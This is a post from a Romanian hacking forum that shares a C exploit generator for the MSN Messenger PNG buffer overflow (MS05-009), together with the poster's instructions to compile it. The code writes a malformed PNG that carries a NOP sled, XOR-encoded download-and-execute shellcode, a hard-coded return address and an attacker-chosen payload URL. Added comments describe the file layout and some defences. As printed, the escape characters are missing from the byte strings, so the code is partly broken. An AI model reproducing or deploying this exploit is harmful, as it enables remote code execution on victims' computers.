Bine ati venit pe HackTeam Forum !
Aici veti gasi o gama larga de metode de hack atat pe Windows cat si pe platforme Linux/Unix , programe in consecinta ,tutoriale .
In acelasi timp aici veti gasi si asistenta help in materie corespunzatoare . Precizam ca tot ce se gaseste pe acest site este doar in scop de dezvoltare iar voi va asumati intreaga raspundere pt actiunile pe care le savarsiti . || SS-TEAM || Va Multumeste pt vizita !
mexykanu
mexican de-ala nesimtit...
Din: Bucuresti
Inregistrat: acum 19 ani
Postari: 607
|
|
Code:
/*
*
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit (MS05-009)
* Bug discovered by Core Security Technologies (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail:
* Credit to kozan and delikon
* Usage:exploit <OutputPath> <Url>
*
*/
/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/
/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/
#include <stdio>
#include <stdlib>
#include <conio>
#include <string>
#ifdef __BORLANDC__
#include <mem>
#endif
/* Filler byte value that main() writes before and after the payload. */
#define NOP 0x90
/*
 * Bytes written at the very start of the output file.
 * Read as hex pairs, the digits spell the PNG signature, a 13-byte IHDR
 * (64x64, bit depth 8, colour type 3 = palette) and the start of a tRNS
 * chunk whose declared length is 0x1B9.
 * Defensive note: a palette image can carry at most 256 tRNS entries, so a
 * parser or content filter can reject a file with this declared length
 * before copying any chunk data.
 * NOTE(review): on this page the literals carry no backslash escapes, so as
 * printed they are plain text rather than the byte values described here.
 */
char png_header[] =
"x89x50x4Ex47x0Dx0Ax1Ax0Ax00x00x00x0Dx49x48x44x52"
"x00x00x00x40x00x00x00x40x08x03x00x00x00x9DxB7x81"
"xECx00x00x01xB9x74x52x4Ex53";
/*
 * Trailer written last by main(), after the four address bytes.
 * NOTE(review): despite the name, the digits do not spell a PNG IEND chunk,
 * so the generated file is not a well-formed PNG.
 */
char pngeof[] = "x90x90x90x59xE8x47xFExFFxFF";
/*
 * Opaque payload blob. According to the original author's note it is a
 * generic win32 HTTP download stub, XOR-encoded with 0x1d by delikon
 * (http://delikon.de/). It is not analysed here; main() patches two bytes
 * inside it and appends the masked URL.
 */
char shellcode[] = "xEB"
"x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF"
"xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13"
"xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2"
"xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90"
"x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2"
"xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48"
"x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43"
"x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96"
"x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD"
"xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47"
"x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D"
"x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33"
"x78x65x78x1D";
/* Output stream for the generated file; opened and closed in main(). */
FILE *di;
/* Shared loop counter: used by every loop in main() and also by Sifrele(). */
int i = 0;
/* 16-bit value that main() derives from the URL length and copies into shellcode. */
short int weblength;
/* Points at argv[2] (the URL argument); the string is XOR-masked in place by main(). */
char *web;
/* Result of the strstr() search inside shellcode; target of the 2-byte patch. */
char *pointer = NULL;
/* Heap buffer holding shellcode followed by the masked URL. */
char *newshellcode;
/*
 * XOR-masks a NUL-terminated string in place with the key 0x1d and returns
 * the same pointer that was passed in.
 *
 * Name1: buffer to transform; it is overwritten (main() passes argv[2]).
 * The length is taken once with strlen() before the loop, and the loop
 * index is the file-scope `i`, so that global is clobbered by every call.
 * A single-byte XOR is its own inverse: applying 0x1d again restores the
 * text, which is how an analyst can recover a URL masked this way.
 */
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;i<Size;i++)
Name[i]=Name[i]^xor;
return Name;
}
/*
 * Entry point: writes a malformed PNG to the path in argv[1] and embeds the
 * URL given in argv[2].
 *
 * Output layout, in write order (all visible below): png_header, 99 filler
 * bytes, the payload with the XOR-masked URL appended, more filler, the four
 * bytes 47 05 5E 00, then pngeof.
 *
 * Defensive reading: the file only affects a PNG parser that copies the
 * oversized chunk without checking its declared length. The file header
 * ties the flaw to MS05-009, so applying that update is the remediation.
 * NOTE(review): the four address bytes are hard-coded, which suggests the
 * file is specific to the client build named in the header - confirm before
 * treating them as a general signature.
 * NOTE(review): neither the argument-count check nor the fopen() failure
 * branch stops execution, so argv[2] and `di` are used unchecked below.
 */
void main(int argc, char *argv[])
{
if (argc < 3)
{
/* Banner and usage text only; control continues after this block. */
printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploitn");
printf("Bug discoveried by Core Security Technologies (www.coresecurity.com)n");
printf("Exploit coded By ATmaCAn");
printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.n");
printf("Web: http://www.atmacasoft.comn");
printf("E-Mail: n");
printf("Credit to kozan and delikonnn");
printf("tUsage:exploit <OutputPath> <Url>n");
printf("tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exen");
}
web = argv[2];
/* Output is opened in binary mode; a failure is reported but not handled. */
if( (di=fopen(argv[1],"wb")) == NULL )
{
printf("Error opening file!n");
}
/* Header bytes first; sizeof-1 drops the literal's terminating NUL. */
for(i=0;i<sizeof(png_header)-1;i++)
fputc(png_header[i],di);
/* 99 filler bytes (NOP value) ahead of the payload. */
for(i=0;i<99;i++)
fputc(NOP,di);
/*
 * Start from 0xff22 and subtract the URL length plus one, then copy the
 * 16-bit result over the placeholder located in shellcode.
 * presumably a length field consumed by the payload - not verifiable here.
 * The strstr() result is not checked before memcpy() writes through it.
 */
weblength=(short int)0xff22;
pointer=strstr(shellcode,"x22xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
/*
 * Build payload + masked URL + one trailing literal in a fresh buffer.
 * Sifrele() rewrites argv[2] in place, so every later strlen(web) measures
 * the masked text, not the original URL. The buffer comes from C++ new[]
 * and is not released before the function ends.
 */
newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
strcpy(newshellcode,shellcode);
strcat(newshellcode,Sifrele(web));
strcat(newshellcode,"x1d");
/* Emit the combined payload, stopping at its first NUL byte. */
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],di);
/* Filler count shrinks as the URL grows, keeping the bytes that follow at a fixed offset. */
for(i=0;i<(83-strlen(web));i++) //NOPs
fputc(NOP,di);
/* Author's note: these four bytes overwrite the saved return address (EIP). */
/* 0x005E0547 - ret; written least-significant byte first. */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);
/* Trailer bytes; sizeof-1 again drops the terminating NUL. */
for(i=0;i<sizeof(pngeof)-1;i++)
fputc(pngeof[i],di);
printf("Vulnarable png file %s has been generated!n",argv[1]);
fclose(di);
} |
FIXED BY MEXYKANU =D 
salvati ca FISIER.cpp si folositi un compilator C++. bafta
edit: e detectat ca virus de antivirus
Modificat de mexykanu (acum 18 ani)
pus acum 18 ani |
|